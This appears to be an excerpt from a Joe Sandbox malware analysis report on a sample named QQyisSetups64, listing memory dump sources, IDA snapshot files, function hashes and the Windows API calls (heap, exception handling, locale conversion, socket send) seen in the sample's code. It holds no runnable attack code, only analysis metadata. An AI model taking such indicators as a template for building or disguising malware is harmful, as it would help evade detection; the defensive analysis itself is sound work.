                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 781180411-0
                                                                                                                                                                                                                      • Opcode ID: 7ea9ff52ef67dde942da6f7c074d998560ac300cf65be50843b0706da87c2d00
                                                                                                                                                                                                                      • Instruction ID: d38077cf9e7e8e668fbb9516dd728fc4ddd1c839eaf7af840dc69fac23c318c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ea9ff52ef67dde942da6f7c074d998560ac300cf65be50843b0706da87c2d00
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 07E08C35C006096BCF113FF18D0CAFF7A2EAE4139CB50CC00EA10A3600EF389951AEA6
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$_vswprintf_s
                                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                                      • API String ID: 3424173483-2746444292
                                                                                                                                                                                                                      • Opcode ID: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
                                                                                                                                                                                                                      • Instruction ID: 5e8b3999bf48f1f83e36e6b2c2398a26ba19e82c77801203b24f105a2119b375
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8561399999e88f50518954755fe2256d0c041f48f054e3226c8471d41118f6d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1B41A6B4A40218AFE720DB64DC84FAA73B9EF08705F40419DE64DEB180DBB5DA848F94
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _memset$_vswprintf_s
                                                                                                                                                                                                                      • String ID: D
                                                                                                                                                                                                                      • API String ID: 3424173483-2746444292
                                                                                                                                                                                                                      • Opcode ID: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
                                                                                                                                                                                                                      • Instruction ID: 542a1b99ef7c7c60b0b3e33978bc30065a68dd6e4083b1b177833c99f6133923
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf7116fa26cd05665a4fc66a2bfa2b13dadcbba7699ed49424b3b1d6dc26d4e0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3941C2B5A00318ABEB24DB64DC85FDE77BCAB44700F1041D8E64DA62C0DAB06B85CF58
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 0378944A
                                                                                                                                                                                                                        • Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EF9B
                                                                                                                                                                                                                        • Part of subcall function 0378EF86: __CxxThrowException@8.LIBCMT ref: 0378EFB0
                                                                                                                                                                                                                        • Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EFC1
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 03789482
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF4E
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: __CxxThrowException@8.LIBCMT ref: 0378EF63
                                                                                                                                                                                                                        • Part of subcall function 0378EF39: std::exception::exception.LIBCMT ref: 0378EF74
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                                                                      • API String ID: 1823113695-4289949731
                                                                                                                                                                                                                      • Opcode ID: 68a6d3116eaf19511dba1eea2a93138e4aa4666691dd7597b61ef029705227c9
                                                                                                                                                                                                                      • Instruction ID: 817cc8f50a9ba72d462c31eaf74df1306834119633416e82a5bbefa2dc6a1c69
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68a6d3116eaf19511dba1eea2a93138e4aa4666691dd7597b61ef029705227c9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7A21A5337806109BC720FF6CE88097AF7D9EB92675B240A6FE296CB641D761D840C3A1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 037884C9
                                                                                                                                                                                                                        • Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EF9B
                                                                                                                                                                                                                        • Part of subcall function 0378EF86: __CxxThrowException@8.LIBCMT ref: 0378EFB0
                                                                                                                                                                                                                        • Part of subcall function 0378EF86: std::exception::exception.LIBCMT ref: 0378EFC1
                                                                                                                                                                                                                      • std::_Xinvalid_argument.LIBCPMT ref: 037884E7
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                                                                                                                                                                                                      • String ID: invalid string position$string too long
                                                                                                                                                                                                                      • API String ID: 963545896-4289949731
                                                                                                                                                                                                                      • Opcode ID: 5c26878c536f22ffef98a3d5740b2660399a7504d91fd0b2eac8a67d34f3e5dc
                                                                                                                                                                                                                      • Instruction ID: d9f30047ca59837ddfe20977d32dfa962668567500fbd7ae81152ea2a0f81a87
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c26878c536f22ffef98a3d5740b2660399a7504d91fd0b2eac8a67d34f3e5dc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D21A276740306EF8B14EF6CE880C59B3A9BF88310754466EF516CB641E730E954C792
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 02893A3A
                                                                                                                                                                                                                        • Part of subcall function 02893995: ___BuildCatchObjectHelper.LIBCMT ref: 028939CB
                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 02893A51
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                      • API String ID: 3487967840-3733052814
                                                                                                                                                                                                                      • Opcode ID: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                                                                      • Instruction ID: e5cf4e7924f0ecab90c470f09624c39d8323bcc67ed12400502e621476769e6b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a0efde82555800522ebcbcdf0ebfc514e59fc27468206ba67c06b53666bf625
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1C01E47D00050ABBDF12AE55CC48EAA7FAAEF09354F088050BD1C95560D73299B1DBA2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ___BuildCatchObject.LIBCMT ref: 0362032D
                                                                                                                                                                                                                        • Part of subcall function 03620288: ___BuildCatchObjectHelper.LIBCMT ref: 036202BE
                                                                                                                                                                                                                      • _UnwindNestedFrames.LIBCMT ref: 03620344
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: BuildCatchObject$FramesHelperNestedUnwind
                                                                                                                                                                                                                      • String ID: csm$csm
                                                                                                                                                                                                                      • API String ID: 3487967840-3733052814
                                                                                                                                                                                                                      • Opcode ID: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                                                                                                                      • Instruction ID: 84482f8d0269d8fbcb746f69fe47f8b7dc07bd5d76cd553c25f97fe84e335578
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4ec08a577bcb042cc7356b16b645f83b0b4d35d15726398ffe3570c0dbe416a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B01463600061ABBCF12AF51CC84EEA7F6AFF08390F094114FC1858120DB7298B2DBA4
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 0378D868
                                                                                                                                                                                                                      • IsBadReadPtr.KERNEL32(?,00000014), ref: 0378D938
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000007F), ref: 0378D963
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Read$ErrorLast
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2715074504-0
                                                                                                                                                                                                                      • Opcode ID: aef5358d38ba6f05c1fdf8fe74e95f5afe91d1f9d69c96b87a316b7d336ddbc1
                                                                                                                                                                                                                      • Instruction ID: bc7e630111be4f192a5680f3f339bf3a050f628cb748087d8279d5cc29ef2984
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aef5358d38ba6f05c1fdf8fe74e95f5afe91d1f9d69c96b87a316b7d336ddbc1
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B5418D71A40205ABDB20EF99D880BAAF3F9FF88314F148599D85997391D774F901CB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2574280796.0000000002880000.00000040.00001000.00020000.00000000.sdmp, Offset: 02880000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2880000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3556499859-0
                                                                                                                                                                                                                      • Opcode ID: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                                                                                                                                      • Instruction ID: 4182a7814d539edc21b882bb4220b3f1d3da7740e149097f32e872a01095ebb5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 720715378607e4f18366517d453de5e5cb8b5ca67b172311fa18d72390665dd8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F6314C39840E35EAF721BF788D887293EE6EB49365B188516E518D7260FB32C481CF51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578011375.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: false
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3600000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __calloc_crt__init_pointers__mtterm_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3556499859-0
                                                                                                                                                                                                                      • Opcode ID: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                                                                                                                                      • Instruction ID: c6e1071400192cec55cf8a353e18060c36fea0ca34dfca66bc2defbe4d04026e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 76c9643fd1df18821398edaab6323fbd9f0414cbbe87c74b2baaec3723e64a7d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28318D35902730EFEB12EB758D98A17BFA4EB44A60B28451AF912DA3B1E7708061DF40
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0379A5F6
                                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 0379A629
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 0379A65A
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 0379A6C8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                                      • Opcode ID: 84cd25617957a522c3dc0b9b4fb67be328806ba7c64dc32fdc7b5bcc0fbe765d
                                                                                                                                                                                                                      • Instruction ID: 494d0718a8ae3397ff10cb102bd9b314cfff5efc52ba7feeedfdeeac73e8d38f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 84cd25617957a522c3dc0b9b4fb67be328806ba7c64dc32fdc7b5bcc0fbe765d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3031D231A06246EFEF60DF64E884EBE7BB5BF01311F1986AAE4518B191D330D940DB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02C8E459
                                                                                                                                                                                                                      • __isleadbyte_l.LIBCMT ref: 02C8E48C
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 02C8E4BD
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 02C8E52B
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3058430110-0
                                                                                                                                                                                                                      • Opcode ID: 5409a707bf48ef68eca7cd22a5544c197f55725a6a658a2406b4ed55b4987517
                                                                                                                                                                                                                      • Instruction ID: 00555c60207080469b045fa209b42342b20fe853a985645d098002fe1fcf130a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5409a707bf48ef68eca7cd22a5544c197f55725a6a658a2406b4ed55b4987517
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C31D431A05255EFDB11EFA4C884ABE3BB5EF8531CF19C5A9F4698B190D330DA40DB51
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: lstrlen$_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2425037729-0
                                                                                                                                                                                                                      • Opcode ID: 6c44f05da83ab8584652adc353d920fd550db10c6ec4312932d0753c131a1cb2
                                                                                                                                                                                                                      • Instruction ID: 897a0cfd58e093b810ed3e3894231262899cf7c1afd9b18dd1a7ba0f54364546
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c44f05da83ab8584652adc353d920fd550db10c6ec4312932d0753c131a1cb2
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EB21FB76B4020CBBCF14EF59DC849BEB3A9EBC4720B69816EED0587301F7319D5186A1
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 037843EC
                                                                                                                                                                                                                        • Part of subcall function 037813A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 037813CB
                                                                                                                                                                                                                        • Part of subcall function 037841E0: EnterCriticalSection.KERNEL32(03784FB5,03784E55,037842BE,00000000,?,?,03784E55,?,?,?,?,00000000,000000FF), ref: 037841E8
                                                                                                                                                                                                                        • Part of subcall function 037841E0: LeaveCriticalSection.KERNEL32(03784FB5,?,?,?,00000000,000000FF), ref: 037841F6
                                                                                                                                                                                                                        • Part of subcall function 03784C70: HeapFree.KERNEL32(?,00000000,?,00000000,03784E55,?,037842C8,03784E55,00000000,?,?,03784E55,?), ref: 03784C97
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 037843D7
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000057), ref: 03784401
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?), ref: 03784410
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$CriticalHeapSection$AllocEnterFreeLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2060118545-0
                                                                                                                                                                                                                      • Opcode ID: b06661632ed82e5706121715d877c20ac714f94266d0a23a2cb5cd4ea6752893
                                                                                                                                                                                                                      • Instruction ID: 1b99ebbe83f3eea1a6c3e5a3bb6676143aa99500fa2b6f78dafd837ca4b487e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b06661632ed82e5706121715d877c20ac714f94266d0a23a2cb5cd4ea6752893
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BB11A73AA45518A78B10FF6AF8445DEB7A8EB88322B4945A6EC0DD7A00D6359D0146D0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • SetLastError.KERNEL32(0000139F), ref: 02C843EC
                                                                                                                                                                                                                        • Part of subcall function 02C813A0: HeapAlloc.KERNEL32(00000000,00000000,?,?,?,?), ref: 02C813CB
                                                                                                                                                                                                                        • Part of subcall function 02C84C50: HeapFree.KERNEL32(?,00000000,?,00000000,02C84E35,?,02C842C8,02C84E35,00000000,?,?,02C84E35,?), ref: 02C84C77
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?), ref: 02C843D7
                                                                                                                                                                                                                      • SetLastError.KERNEL32(00000057), ref: 02C84401
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32(?), ref: 02C84410
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$Heap$AllocFree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1906775185-0
                                                                                                                                                                                                                      • Opcode ID: 2b77472b835e58551904f0fc8ed1e280bdcf17db5dab450bc167e2fe869645f9
                                                                                                                                                                                                                      • Instruction ID: c5b0608ada8dc7099c9bf013af7c3189ccda051a7d4777d9c33ef4da7d0d121e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b77472b835e58551904f0fc8ed1e280bdcf17db5dab450bc167e2fe869645f9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3211CA36E055189B8720FF69F8446EEB7A8EFC4376B4445A6ED0CD7200D735991146D0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378DE93
                                                                                                                                                                                                                      • _free.LIBCMT ref: 0378DED5
                                                                                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,0378DC95), ref: 0378DEFC
                                                                                                                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0378DF03
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Heap_free$FreeProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1072109031-0
                                                                                                                                                                                                                      • Opcode ID: 7b9b6b6d48e6e1b4b88665f9a8b1b1c6496c48bdee09efaea90f9fd5f5bfaaec
                                                                                                                                                                                                                      • Instruction ID: fad41408b7f5f153a80e34492448ac69b44765c5687ac7e4660aa928007431c1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b9b6b6d48e6e1b4b88665f9a8b1b1c6496c48bdee09efaea90f9fd5f5bfaaec
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7711FB75640B009BD730EB65CD49F67B3AABF84710F18891CE59A87A90DB74F842CB91
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WSAEventSelect.WS2_32(?,03783ABB,00000023), ref: 03783C02
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 03783C0D
                                                                                                                                                                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 03783C58
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 03783C63
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ErrorLast$EventSelectsend
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 259408233-0
                                                                                                                                                                                                                      • Opcode ID: 8cd3f0d9044cd6883f523ba285a0cb2b39d81abba004dc94c88477b3f1d148d5
                                                                                                                                                                                                                      • Instruction ID: 4b950e8752de16b2a6b2583d3798b80cdf45c6f1272777ca6d1d8a3baededc9f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8cd3f0d9044cd6883f523ba285a0cb2b39d81abba004dc94c88477b3f1d148d5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 461170BA600B009BE720EF7DD888A57B6F9FBC9B10F114A2DF556C7A81D775E4008B50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WSAEventSelect.WS2_32(?,02C83ABB,00000023), ref: 02C83C02
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 02C83C0D
                                                                                                                                                                                                                      • send.WS2_32(?,00000000,00000000,00000000), ref: 02C83C58
                                                                                                                                                                                                                      • WSAGetLastError.WS2_32 ref: 02C83C63
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
